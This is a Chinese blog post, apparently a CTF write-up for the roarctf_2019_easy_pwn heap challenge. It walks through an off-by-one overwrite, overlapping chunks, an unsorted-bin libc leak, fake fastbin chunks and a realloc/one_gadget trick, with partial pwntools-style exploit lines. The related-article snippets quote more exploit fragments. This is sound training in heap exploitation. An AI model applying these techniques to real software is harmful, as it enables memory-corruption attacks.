roarctf_2019_easy_pwn

最新推荐文章于 2024-03-12 21:30:23 发布
最新推荐文章于 2024-03-12 21:30:23 发布
阅读量348 收藏
点赞数
分类专栏: 新手 pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51687381/article/details/119227483
版权
新手 同时被 3 个专栏收录
23 篇文章 0 订阅
订阅专栏
ctf
15 篇文章 0 订阅
订阅专栏
pwn
11 篇文章 0 订阅
订阅专栏

 没有UAF,但是存在着off-by-one

所以先add(0x18)#chunk0和一个(0x10)#chunk1,add(0x90),add(0x10)

为什么是0x18?因为0x18会开辟一个共0x20的chunk,一开始我也以为是一个0x30的大小,但是

在chunk结构中  0x560df2c462b0 -0x560df2c462b8 这片区域中也会被chunk0使用。这样才能更接近chunk1的size域,对其进行攻击。

所以,根据上面的off_by_one修改chunk1的size(多出的一个字节)

edit(0,34,'a'*0x10+p64(0x20)+p8(0xa1))  #34的原因是0x18 + 10 也可以比34要大

 但是这里p64(0x20)。

出现了chunk覆盖。这时候free掉,再malloc回来,就可以控制chunk1。但要注意的是,要躲避检查。

edit(2,0x80,p64(0)*14+p64(0xa0)+p64(0x21))

 

这样,伪造出一个chunk1物理地址紧邻的chunk。

接下来就拿chunk1。

delete(1)
add(0x90)

但由于是alloc,会清空用户数据,所以需要重新恢复。

edit(1,0x20,p64(0)*2+p64(0)+p64(0xa1))

接下来就是上次学习的unsorted bin 泄露libc

delete(2)	
show(1)

拿到main_arena + offset(动态调试后观察到这个offset为88)(我在这里调试失败了,不知道哪里出错了)

因libc的起始位置可能会发生变化,但是libc中的内容之间的相对位置没有变化。

所以要计算出libc实际加载的位置与libc位置的偏移,这也叫程序偏移量。

edit(1,0x90,p64(0)*2+p64(0)+p64(0x71)+p64(0)*12+p64(0x70)+p64(0x21))

再伪造一个chunk,为什么是0x71,和之前发的文章是一个道理,这往后的套路基本上就是固定的了。

区别在于这道题需要realloc来调整栈结构,根据不同程序执行到one_gadget时栈环境的不同,需要进行不同数量的push和pop来调整。并且realloc相比于malloc,在检查hook之前,realloc有着大量的push和pop操作,我们只需要将合适的位置放入就可以调整

Hush^
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【pwn】roarctf_2019_easy_pwn
Nothing
12-24 2078
例行检查 保护全开,分析程序。 当edit大小比申请大小多10的时候可以多输入一字节,存在off-by-one。修改size来进行overlap。需要注意的是最后覆盖malloc_hook时,onegadget都不可用,应为栈条件不满足,可以利用realloc的trick来调整栈。 参考:堆的六种利用手法 from pwn import * io=remote('xx.xx.xx.xx',xx...
BUUCTF【roarctf_2019_easy_pwn】(off by one)
weixin_51055545的博客
02-03 1110
BUUCTF【roarctf_2019_easy_pwn】 检查程序: 保护机制全开 分析: add(),show(),free()函数都正常,漏洞点在edit()中 a2-a1=10时,我们可以多写入一个字节,存在by one溢出 思路: 1.堆风水泄露libc地址 2.堆块重叠劫持malloc_hook为one_gadget 3.申请触发one_gadget exp: leak地址: add(0x90) add(0x18) add(0x90) add(0x90) free(0) edit(1,0
[BUUCTF]PWN——roarctf_2019_easy_pwn(详解)
mcmuyanga的博客
12-18 2239
roarctf_2019_easy_pwn 附件 步骤: 例行检查,64位程序,保护全开 试运行一下程序,看看大概的情况,经典的堆块的菜单 64位ida载入,改了一下各个选项的函数名,方便看程序(按N) add edit free show 这道题通过 offbyone来构造重叠chunk,达到任意地址分配chunk的效果,然后修改__realloc_hook地址处的内容为one gadget地址,修改malloc_hook地址处的内容为ralloc函数的地址+x 我们先申
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
攻防世界PWN之EasyPwn题解
seaaseesa的博客
11-15 3682
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
new-easy(pwn)
最新发布
m0_72827793的博客
03-12 1255
由于栈溢出攻击的主要目标通过溢出覆盖函数栈高位的返回地址,因此其思路是在函数开始执行前,即在返回地地址前写入一个字长的随机数据,在函数返回前校验该值是否被改变,如果被改变,则认为是发生了栈溢出。与ASLR保护十分类似,PIE保护的目的是让可执行程序ELF的地址进行随机化加载,从而使得程序的内存结构对攻击者完全未知,进一步提高程序的安全性。ASLR的目的是将程序的堆栈地址和动态链接库的加载地址进行一定的随机化,这些地址之间是不可读写执行的为映射内存,降低攻击者对程序内存结构的了解。
roarctf_2019_easy_pwn 1/100
m0_57754423的博客
02-22 1490
edit chunk的功能里 存在off_by_one漏洞。 利用思路: 构造堆块重叠 然后house of sprit。 exp: from pwn import * p = process("./roarctf_2019_easy_pwn") e = ELF("./roarctf_2019_easy_pwn") libc = e.libc context.log_level = "debug" p.timeout = 0.1 def add(size): p.recvuntil("./ch
萌新学pwn-roarctf_2019_easy_pwn
qq_36495104的博客
06-28 554
roarctf_2019_easy_pwn 安全检查 可以劫持malloc_hook ida查看 main __int64 __fastcall main(__int64 a1, char **a2, char **a3) { int choice; // [rsp+4h] [rbp-Ch] __int64 savedregs; // [rsp+10h] [rbp+0h] setvbuf_3(); while ( 1 ) { menue(); choice = rea
[BUUCTF]PWN——roarctf_2019_easy_pwn
qq_51687381的博客
07-29 256
白天睡觉,晚上来写道题。 这道题涉及了unsortedbins,malloc_hook,堆溢出。 heap的菜单选项常规题,做到目前为止,主要是两个思路: 先check,根据RELRO。如果为full,那么就需要malloc_hook。如果为partial,就直接更改got表就可以了。 在create函数中可以明显看出来这是个结构体 一个结构体有24个字节,前8个为标志位,中间8个size位,后8个是alloc出来的chunk的指针。 (alloc和malloc不同的是 alloc的fr
roarctf_2019_easy_pwn[off by one]
、moddemod
07-01 339
溢出一个字节,修改size域 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def create_note(size, ): p.sendlineafter('choice:', str(1)) p.sendlineafter('size:', str(size)) def write_note(index,...
RoarCTF easy_pwn writeup
qq_43189757的博客
10-13 3009
漏洞点: 在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞 漏洞利用思路: 大体路线: **1.**修改chunk1 的size为0xf1 **2.**修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了ch...
buuoj刷题记录 - roarctf_2019_easy_pwn
qq_34010404的博客
03-17 192
检查一下保护: 拖进IDA分析程序: 问题处在write函数中, 最后可以溢出一个字节. 思路:溢出一个字节覆盖下一个chunk的prev in use标记位.然后向前合并,构造重叠chunk。 下面是我的构造方法: create三个这样的chunk free掉0 ,然后利用chunk1 覆盖掉chunk2的prev in use 标记位.同时在chunk1内布置好prev size.(glibc-2.23不会通过prev size 找到chunk ,然后比较前一个chunk的size,所以
xdctf2015_pwn200
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值